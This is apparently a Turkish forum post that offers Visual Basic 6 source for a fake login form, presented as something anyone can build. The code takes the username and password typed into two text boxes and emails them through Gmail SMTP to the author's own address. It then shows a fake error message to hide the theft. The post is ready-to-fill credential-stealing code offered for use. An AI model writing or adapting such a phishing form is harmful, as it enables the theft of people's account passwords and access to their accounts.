Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
googlede bir çok video ve kod source herşey var yeterki yapmak iste biraz araştır ama önce istersen video veya source verebilirim
Private Sub Command1_Click()
Dim iMsg, iConf, Flds
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
schema = "http://schemas.microsoft.com/cdo/configuration/"
Flds.Item(schema & "sendusing") = 2
Flds.Item(schema & "smtpserver") = "smtp.gmail.com"
Flds.Item(schema & "smtpserverport") = 465
Flds.Item(schema & "smtpauthenticate") = 1
Flds.Item(schema & "sendusername") = "emailiniz" '
Flds.Item(schema & "sendpassword") = "şifreniz" '
Flds.Item(schema & "smtpusessl") = 1
Flds.Update
With iMsg
.To = "emailiniz" '
.From = "emailiniz" '
.Subject = "mail konu başlığı"
.HTMLbOdy = "Username : " & Text1.Text & vbCrLf & vbCrLf & "Password : " & Text2.Text
.Organization = "Mail Organtion"
.ReplyTo = "-"
Set .Configuration = iConf
SendEmailGmail = .Send
End With
MsgBox "hata mesajınız", vbCritical, "hata mesajı başlığınız" '
End Sub